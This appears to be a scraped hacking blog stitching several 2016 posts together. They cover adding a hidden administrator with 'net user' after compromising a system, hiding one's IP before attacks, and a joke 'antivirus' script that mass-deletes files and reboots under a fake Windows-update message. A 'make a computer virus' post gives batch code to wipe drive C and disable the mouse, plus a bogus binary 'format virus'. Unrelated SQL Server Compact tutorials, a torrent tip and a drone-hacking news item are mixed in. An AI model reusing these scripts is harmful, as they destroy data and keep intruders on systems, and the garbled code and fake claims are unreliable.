Friday, 30 September 2016

How to Add User With Administrator Rights Using Command Prompt

"How to Add User With Administrator Rights Using Command Prompt". If you follow this tips and trick, maybe it will not exceed 1 minute, even for some of you can do it in less than 30 second

This tips and trick will add a user with administrative rights, you will need it when you owned a system to add a user there.

Okay lets start it.

Requirement :

1. Command Prompt [or] shell you got from a compromised system

Step by Step :

1. Open your command prompt and type this command :

net user /add v4L 12345

The command above will add user name v4L with password 12345. If you just add until this step, you just add user with limited privilege.

2. The next step, we continue to add another command

net localgroup administrators v4L /add

Now in this 2nd step, we add our user v4L to administrators group. Now this user already has an administrative rights.

3. We move again to the last 3rd step, now lets type again another command :

net share concfg*C:\/grant:v4L,full
or

net share SHARE_NAME=c:\ /grant:v4L,full

The command above will grant user name v4L will full grant, that’s mean v4L can do everything on the system including see other users file 🙂

Hope it useful


Share this article if you found this post was useful

Friday, 16 September 2016

How to Hide Your IP Address or How to Change your IP Address



After a lot of requests from various hackers across the world, we are coming up with this post on . This post will tell you How to Hide Your IP Address or How to Change your IP Address
Changing or Hiding the IP address

is one of the biggest concerns of all Hackers as the IP Address can
reveal the identity if the Hacker. Its just like your online address. If
anyone can find your actual online address (IP Address), tracing you
back won’t be that difficult.
Thus it is very important to hide or change your IP address before doing any kind of hacking attack or even think of doing so.
After getting hundreds of request on a tutorial on how to hide your IP
address, here I am writing a detailed step by step tutorial on how to
hide or change ip address.
We are using the proxy service called Hide my Ass (pro VPN).
What’s that? Let me explain in detail.
We all know about proxy servers. They help us to hide your ip address or change ip address but there are many things you guys don’t know.

1) Free proxies are not completely anonymous – Your up can be disclosed by
the website owner to the concerned authorities if needed.

2)Companies limit the maximum speed of browsing in free proxies – Say your
internet speed is 8 Mbps, still using free proxies you can browse
internet with a speed of only 265 kbps. This is irritating, isn’t it.

3) Many Webmasters can block users accessing free proxies.
There are different type of proxies. Read Types of Proxy | How to Hide IP Address for more.
Even I wanted a reliable and Elite Proxy which can help me completely hide
my Online Identity and what else could be better than changing my IP
address every minute. I looked for many solutions online and then I
found the PRO VPN of Hide My Ass.
To be very honest, in the beginning I was a bit confused when I saw the
software. I was not very sure if it would work the way I wanted to but
then I gave it a try. I thought of jiving it a try just for 1 month. It
was just for $11.52 then , not it costs $9.99 only. I could actually
think of spending $11.52 for my only if it gave me the kind on anonymity
I wanted on internet. It helped me secure my online Identity online.
Here are benefits I got after using the PRO VPN of Hide My Ass.
  1. Super fast, high speed elite / anonymous proxies. Elite proxies are 100 times more secure than free proxies
  2. I could select the country whose IP address I wanted in just 1 click. It
    offers over 38000+ unique IP Address from 53 different countries.
  3. I can set the timer to automatically change the IP Address. This way my
    IP Address gets changed every minute without me bothering to do so. If I
    am implementing a hacking attack, no-one could actually find my actual
    IP Address so I am always on the safer side.
  4. It anonymously
    encrypts all the traffic and works with all kind of platforms. Unlike
    free proxies the PRO VPN of Hide My Ass is not blocked by the websites.
    The traffic seems to be of legitimate human users, not proxies so on one
    can catch you using them.

Friday, 5 August 2016

Free Hacking Course

Complete Free Hacking Course: Go from Beginner to Expert Hacker Today! 
Everything you need to get started as a hacker and take your hacking skills to an expert level is included in this free screen capture HD video tutorial course! Begin with the basics of hacking including what is ethical hacking, introduction to hacking terms, and how hackers setup their computers. Follow along as you see exactly what software you need including VirtualBox and Kali Linux. See what to do next after you 


Saturday, 25 June 2016

Creating An Advanced Antivirus with Notepad


 
If you are lazy to download antivirus (let alone pay forthere is another way in eradicating the virusThat is, with "Notepad." Okay, the way he is with a script / codethat is typed in notepadthen notepad replaced its extensionWellother than toeradicate the virusyou can surprise your friends who do not know thisWell, here's how:

Method 1eliminate or eradicate the virus do you know his name
1.Open Notepad
2.Copy and Paste the code below

@echo off
echo turns of the virus
taskkill /F /IM virusname1.exe /IM virusname2.exe
echo remove all viruses by size
for /R C:\ %%a in (*.exe) do if %%~za equ 157184 del /A: H S R A “%%a”
echo remove virus that disguised
echo to drive c and subfolder
for /R C:\ %%a in (*.doc.exe) do del “%%a”
echo to drive d and subfolder
for /R D:\ %%a in (*.doc.exe) do del “%%a”
echo returns the Document is in the Hidden
cd /d c:\
echo to drive c and subfolder
attrib *.doc -H -S -A /S
cd /d d:\
echo to drive d and subfolder
attrib *.doc -H -S -A /S
exit

Descriptionvirusname1 and virusname2 be filled with the virus name you know.
4.Save As with the name Anything.bat , change to All Files and not TXT (Just have to bat extension). Example: Antivirus.bat

Method 2Remove Virus do you know his name and remove any virus bat 
1.Open Notepad
2.Copy and Paste the code below

x=msgbox("Anti-Virus should delete some of the virus's that you may have.",1+16 , "Alert")
x=msgbox("what this does is removes anything that Has any text that seems like a virus",1+16 ,"Alert")
x=msgbox("It will also go through your computer and delete All Batch Files.",1+16 ,"Alert")
x=msgbox("If you want any of you .bat files saved then do so before hitting okay",1+16 ,"Alert")
x=msgbox("The Anti-Virus software is now ready to begin.
click okay to begin".1+16 ,"Alert")
del (:'bat*):
x=msgbox("All BAT Files sucessfully removed. click okay to Continue,",1+16 ,"Alert)
del virus.vbs
del virus.bat
del torjan.bat
del torjan.vbs
del infected.bat
del infected.vbs
del TROJ.bat
del TOR.vbs
del Torjan Horse.Bat
del Torjan Horse.vbs
del OM.bat
del OM.vbs
del Macro Virus.bat
del Micro Virus.vbs
del conflicker.bat
del conflicker.bat
del trojan.bat
del trojan.vbs
del Trojan Horse.Bat
del Trojan Horse.vbs
x=msgbox("Anti-Virus Completed...Will Now test and make working",1+16 ,"Alert)
open notepad
open mspaint
open controlpanel
open MyDocuments
x=msgbox("Now we will Shutdown/Restart your computer, and windows will install an important update for your computer",1+16 ,"Alert)
Shutdown -r -c "Rebooting computer for important windows updates"
x=msgbox(anti-Virus Software Complete. The program now close.",1+16,;"Alert")
DescriptionYou can add the name of the virus you know.
4.Save As with the name Anything.bat , change to All Files and not TXT (Just have to bat extension). Example: Antivirus.bat

Tuesday, 7 June 2016

How to Make a Computer Virus



>>>Virus that format C: Drive:

 1. Open Notepad and copy below code into it.
@Echo off
Del C: *.* |y
   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.


>>>Virus that Disable Mouse:

  • Open Notepad and copy below codes
rem ———————————
rem Disable Mouse
set key=”HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ———————————
  • Save this file as  virus.bat
  • Done you just created your virus.

>>>Virus that create binary virus to format HARDDIsK:

   1. Copy the below codes into Notepad.

01001011000111110010010101010101010000011111100000
   2. Save the file as Format.exe
   3. You just created virus to format Hard Drive. Enjoy !!!

 

Warning: Please don’t try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

How to add a reference to SQL Server Compact 4.0 for Central Deployment


  1. In Solution Explorer, right-click References and select Add Reference.
    Note
    If the References folder is not listed in Solution Explorer, click Show All Files at the top of Solution Explorer.

  2. In the list of .NET Assemblies, select System.Data.SqlServerCe, and then click OK. If System.Data.SqlServerCe is not listed, follow these steps:
    1. In the Add References dialog box, click Browse.
    2. Navigate to the following folder: %Program Files%\Microsoft SQL Server Compact Edition\v4.0\Desktop.
    3. Select System.Data.SqlServerCe.dll, then click OK.
    The list of references in Solution Explorer now includes System.Data.SqlServerCe and your project can use this assembly.
    Note Note
    If your project uses the Entity Framework, repeat the same steps to add a reference to System.Data.SqlServerCe.Entity. You can add System.Data.SqlServerCe.Entity from list of .NET assemblies, or you can browse to %Program Files%\Microsoft SQL Server Compact Edition\v4.0.

  3. In Solution Explorer, right-click Form1.cs or Form1.vb and select View Code.
  4. At the top of the code for the form, add a directive to use the System.Data.SqlServerCe namespace. If you use the Entity Framework, add a directive to use the System.Data.SqlServerCe namespace. For a Tablet PC application, also add a directive to use the Tablet PC API:

    • C#
      using System.Data.SqlServerCe;
      using System.Data.SqlServerCe.Entity; 
      using Microsoft.Ink;
       
    • Visual Basic
      Imports System.Data.SqlServerCe
      Imports System.Data.SqlServerCe.Entity
      Imports Microsoft.Ink
      

Wednesday, 1 June 2016

Watch Torrent Videos Online without Downloading 2016

Torrent is one of the most popular tool for downloading movies and other videos. But the problem with the torrent is that many of the links provided are fake, which is quite difficult to identify. Some of the torrents come with sample video quality where you can check video quality, and download it, if it satisfies you. 


But what about rest?? I mean those torrents that don not come with any sample! How will you identify between fake and genuine torrent. For that I'm going to give you a small trick that works well in Chrome, Firefox and Opera.


TS(Torrent Stream) magic plays torrents online in the original quality without downloading.It works same as torrent,based on number of peers connected to us.If the peers are more and internet connection is good streaming will be fast.Or we can stream it for some time to check quality of the video,if the quality is good we can download that film or video using utorrent.


Downloading TS magic player:
  • Open torrent URL
  • Now you will see an option to play online
  • If not then right click on "Download torrent link" and select "View Torrent Online"

how to Select/Insert/Delete/Update records in SQL Server Compact database file(*.sdf) in VB.NET.

how to Select/Insert/Delete/Update records in SQL Server Compact database file(*.sdf) in VB.NET.

Please check the following code sample demonstrating how to Select/Insert/Delete/Update records in SQL Server Compact database file(*.sdf) in VB.NET.
I presume the SQL Server Compact database file C:\Northwind.sdf contains a Table named Users which has two fields as below: Field Name    Data Typename            Varchar(20)phone           Varchar(20)
Imports System.Data.SqlServerCe  
Public Class Form1  
    ' Shared variables  
    Dim con As SqlCeConnection = New SqlCeConnection("Data Source=C:\Northwind.sdf")  
    Dim cmd As SqlCeCommand  
    Dim myDA As SqlCeDataAdapter  
    Dim myDataSet As DataSet  
    Private Sub Form1_Load(ByVal sender As System.ObjectByVal e As System.EventArgs) Handles MyBase.Load  
        ShowData()  
    End Sub 
    'Binding database table to DataGridView  
    Public Sub ShowData()  
        cmd = New SqlCeCommand("Select * FROM Users", con)  
        If con.State = ConnectionState.Closed Then con.Open()  
        myDA = New SqlCeDataAdapter(cmd)  
        myDataSet = New DataSet()  
        myDA.Fill(myDataSet, "MyTable")  
        DataGridView1.DataSource = myDataSet.Tables("MyTable").DefaultView  
    End Sub 
    ' Retrieve/Select records  
    Private Sub Button1_Click(ByVal sender As System.ObjectByVal e As System.EventArgs) Handles Button1.Click  
        cmd = New SqlCeCommand("SELECT * FROM Users Where name='Martin'", con)  
        If con.State = ConnectionState.Closed Then con.Open()  
        Dim sdr As SqlCeDataReader = cmd.ExecuteReader()  
        While sdr.Read = True 
            MessageBox.Show(sdr.Item("name") & " " & sdr.Item("phone"))  
        End While 
        sdr.Close()  
    End Sub 
    ' Insert record  
    Private Sub Button2_Click(ByVal sender As System.ObjectByVal e As System.EventArgs) Handles Button2.Click  
        cmd = New SqlCeCommand("Insert Into Users(name, phone) Values('phenry', ‘88866677’)", con)  
        If con.State = ConnectionState.Closed Then con.Open()  
        cmd.ExecuteNonQuery()  
        ShowData() 'Rebinding to DataGridView and view result  
    End Sub 
    ' Update record  
    Private Sub Button3_Click(ByVal sender As System.ObjectByVal e As System.EventArgs) Handles Button3.Click  
        cmd = New SqlCeCommand("Update Users Set phone=’34’ Where name='Martin'", con)  
        If con.State = ConnectionState.Closed Then con.Open()  
        cmd.ExecuteNonQuery()  
        ShowData() 'Rebinding to DataGridView and view result  
    End Sub 
    'Delete record  
    Private Sub Button4_Click(ByVal sender As System.ObjectByVal e As System.EventArgs) Handles Button4.Click  
        cmd = New SqlCeCommand("Delete * From Users Where name='Martin'", con)  
        If con.State = ConnectionState.Closed Then con.Open()  
        cmd.ExecuteNonQuery()  
        ShowData() 'Rebinding to DataGridView and view result  
    End Sub 
    ' Dispose Database Connection object  
    Private Sub Form4_FormClosed(ByVal sender As System.ObjectByVal e As System.Windows.Forms.FormClosedEventArgs) Handles MyBase.FormClosed  
        con.Close()  
        con = Nothing 
    End Sub 
End Class 

Monday, 30 May 2016

HACKING PARROT DRONES

Two security researchers at the recent Def Con conference presented the results of their studies on hacking Parrot drones.  Their findings are surprising.

At the recent Def Con conference in Las Vegas, security experts demonstrated in two different talks how to exploit vulnerabilities in commercial drones manufactured by Parrot.
In one of the attacks, the researchers were able to shoot down the aircraft making it fall, the technique was able also to hit the Bebop model.
The circumstance is disconcerting if we think that an attacker can use the drone to hit a target.
Ryan Satterfield, a security expert from the Planet Zuda firm, demonstrated a takedown of a Parrot A. R. Drone by exploiting the drone’s built-in Wi-Fi, the researchers accessed the UAV through an open Telnet port in the implementation of the BusyBox OS. The expert connected to the drone through the open port, gaining root access to the controller, then it was a joke for him to kill the processes used to control the flight of the drone.